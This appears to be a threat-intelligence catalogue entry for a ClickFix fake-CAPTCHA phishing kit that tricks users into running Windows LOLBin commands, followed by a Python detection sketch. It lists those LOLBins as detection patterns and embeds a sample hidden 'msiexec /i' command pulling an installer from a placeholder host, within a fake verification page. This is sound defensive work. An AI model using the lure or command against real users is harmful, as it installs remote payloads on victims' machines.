Known malicious kit | critical | phishing
ClickFix FakeCAPTCHA — LOLBin variant (msiexec/mshta/wmic/etc.)
family: clickfix-fakecaptcha
Same fake-CAPTCHA flow as the PowerShell variant, but the copied command is a non-PowerShell Windows LOLBin (msiexec /i <URL>, mshta, wmic, certutil, regsvr32, curl, iex, Invoke-Expression). First validated live on 00c29c34fd.nxcli.io from ThreatFox's IClickFix-tagged feed (scan 52b189eb / 2f465516 / f6c071f8). Markup-tolerant string matchers (<b>R</b> / <b>V</b> / <b>Enter</b>) catch kits whose instruction text is HTML-formatted.
Fingerprint anchors
No JS-hash anchors (YARA-anchored kit).
Provenance
Added by: analyst
Added: 2026-05-27 10:49
YARA-anchored. Sister to the PowerShell rule under the same family slug.
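The markup-tolerant matching described in the kit summary, sketched in Python as an added example (this is not the catalogue's YARA rule). The function names, the Win/Ctrl modifier wording and both sample pages are assumptions constructed for illustration; the LOLBin list is the one given in the summary.

```python
import html
import re

# LOLBin names from the kit summary above.
LOLBINS = ("msiexec", "mshta", "wmic", "certutil", "regsvr32",
           "curl", "iex", "invoke-expression")
TAG_RE = re.compile(r"<[^>]+>")
# Keystroke steps of the fake-CAPTCHA flow; modifier wording is an assumption.
STEP_RES = (
    re.compile(r"\bwin(?:dows)?(?:\s+key)?\s*\+\s*r\b"),
    re.compile(r"\bctrl\s*\+\s*v\b"),
    re.compile(r"\benter\b"),
)
LOLBIN_RE = re.compile(
    r"(?<![\w-])(" + "|".join(map(re.escape, LOLBINS)) + r")(?:\.exe)?(?![\w-])"
)

def visible_text(page_html):
    """Replace tags with spaces so '<b>R</b>' reads as 'R', then normalise."""
    text = html.unescape(TAG_RE.sub(" ", page_html))
    return re.sub(r"\s+", " ", text).strip().lower()

def clickfix_lolbin_hits(page_html):
    """Return LOLBins named on a page that also shows all three steps, else []."""
    text = visible_text(page_html)
    if not all(rx.search(text) for rx in STEP_RES):
        return []
    return sorted(set(LOLBIN_RE.findall(text)))

# Constructed sample: HTML-formatted instructions plus a LOLBin command string.
FAKE_CAPTCHA = """
<div class="captcha"><h3>Verify you are human</h3>
<ol><li>Press <b>Win</b>&nbsp;+&nbsp;<b>R</b></li>
<li>Press <b>Ctrl</b> + <b>V</b></li>
<li>Press <b>Enter</b></li></ol>
<textarea hidden>msiexec /i https://example.invalid/a.msi</textarea></div>
"""

# Constructed benign page: paste shortcut and a tool name, but no Run-dialog step.
BENIGN = "<p>Paste with <b>Ctrl</b>+<b>V</b>, press <b>Enter</b>. Docs mention curl.</p>"

if __name__ == "__main__":
    print(clickfix_lolbin_hits(FAKE_CAPTCHA))
    print(clickfix_lolbin_hits(BENIGN))
```

Requiring all three keystroke steps alongside a LOLBin name keeps ordinary shortcut help pages from matching; a matcher run on the raw markup would miss the sample because the key names are split by `<b>` tags.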